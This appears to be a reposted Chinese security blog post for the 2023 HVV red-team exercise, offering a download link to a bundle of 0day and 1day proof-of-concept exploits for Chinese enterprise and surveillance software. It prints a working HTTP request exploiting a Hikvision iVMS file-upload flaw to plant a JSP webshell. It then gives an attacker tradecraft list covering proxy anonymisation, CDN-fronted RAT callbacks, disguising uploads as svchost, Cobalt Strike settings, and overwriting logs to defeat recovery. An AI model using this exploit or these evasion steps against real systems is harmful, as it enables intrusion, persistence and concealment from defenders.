2023HVV最新0day、1day消息含POC、EXP

2023HVV最新0day、1day消息含POC、EXP_第1张图片

点击"仙网攻城狮”关注我们哦~

不想当研发的渗透人不是好运维4cc164923a9765f47d399b402a7711c4.png

让我们每天进步一点点

简介

2023HW-8月10号0day、1day漏洞汇总,包含以下漏洞需要自取。

链接:https://pan.baidu.com/s/1duOyDNjYBPKfC5eB9ZHA2Q
提取码:6666
通达OA sql注入漏洞 CVE-2023-4165 POC
通达OA sql注入漏洞 CVE-2023-4166 POC
泛微E-Office9文件上传漏洞 CVE-2023-2648 POC
泛微E-Office9文件上传漏洞 CVE-2023-2523 POC
深信服应用交付系统命令执行漏洞 POC
广联达oa sql注入漏洞 POC
广联达oa 后台文件上传漏洞 POC
HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC
HiKVISION 综合安防管理平台 report 任意文件上传漏洞 POC
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 POC
网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞 POC
汉得SRM tomcat.jsp 登录绕过漏洞 POC
辰信景云终端安全管理系统 login SQL注入漏洞 POC
蓝凌OA前台代码执行漏洞POC

2023HVV最新0day、1day消息含POC、EXP_第2张图片

海康威视iVMS综合安防系统任意文件上传漏洞复现0day

POST /svm/api/external/report HTTP/1.1
Host: xxxxx
Content-Length: 2849
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../tomcat85linux64.1/webapps/els/static/111.jsp"
Content-Type: application/zip


xxxxx(优先建议哥斯拉base64)
------WebKitFormBoundary9PggsiM755PLa54a--

祝各位HVV顺利

工作环境

  • 工作时全部操作均在虚拟机中完成

  • 虚拟机中不登陆个人帐号,如QQ、微信、网盘、CSDN等

  • 渗透环境、开发环境、调试环境需要分开,从目标服务器上下载的程序需要在单独的环境中测试运行

  • 渗透虚拟机中全程使用代理IP上网

  • 物理机必须安装安全防护软件,并安装最新补丁,卸载与公司相关的特定软件

  • fofa、cmd5、天眼查等第三方工具平台帐号密码不得与公司有关,云协作平台同理

  • RAT使用CDN保护的域名上线

  • 尽量不使用公司网络出口,可以使用移动4G网卡,然后虚拟机再链代理

渗透工具

  • WebShell不能使用普通一句话木马,连接端使用加密流量,建议使用蚁剑

  • 不使用默认冰蝎,需要修改为硬编码密钥

  • 内网渗透时尽量使用socks代理,在本地操作

  • 上传程序到目标服务器时,需要修改文件名:如svchost等,尽量不上传内部自研工具

  • 公开工具需要去除特征指纹,如:sqlmap、masscan、Beacon证书

  • 工具需要设置线程或访问频率,如sqlmap的--delay、内网扫描时线程不大于5

  • Cobalt Strike后⻔上线后,设置time.sleep⼤于500秒

  • 手机短信验证码需使用在线平台如z-sms.com

  • socks代理通道需要使用SSL加密

重点

  • 攻防演习成功的关键是团队协作,要互相帮助学习和进步,不要勾心斗角,每个团队的成功都需要有人当红花有人当绿叶的,外网打点与内网渗透同等重要

  • 渗透过程中,记住上传的webshell、木马等地址,服务器添加的账号,项目结束后要删除或描述在报告中,避免不必要的麻烦

  • 登陆3389不建议添加用户,尝试激活guest,如必须要添加账号,账号名与目标相关即可,避免使用qax、qaxNB等友商关键词

  • 清理日志时需要以文件覆盖的方式删除文件,防止数据恢复,或者仅删除指定ID的日志

  • 碰到蜜罐就不要慌,多喝点花茶,这样嘎了会比较香

往期内容

2023HVV必修高危漏洞合集

能让你躺着挖洞的BurpSuite插件

一键启动+AWVS+Sqlmap+BurpSutie+Xray多级代理联合挖洞

1e60e19d24b300cc0253722604695da7.gif

2023HVV最新0day、1day消息含POC、EXP_第3张图片

更多资讯长按二维码 关注我们

   专业的信息安全团队,给你最安全的保障。定期推送黑客知识和网络安全知识文章,让各位了解黑客的世界,学习黑客知识,普及安全知识,提高安全意识。

觉得不错点个“赞”呗2023HVV最新0day、1day消息含POC、EXP_第4张图片      

你可能感兴趣的:(2023HVV最新0day、1day消息含POC、EXP)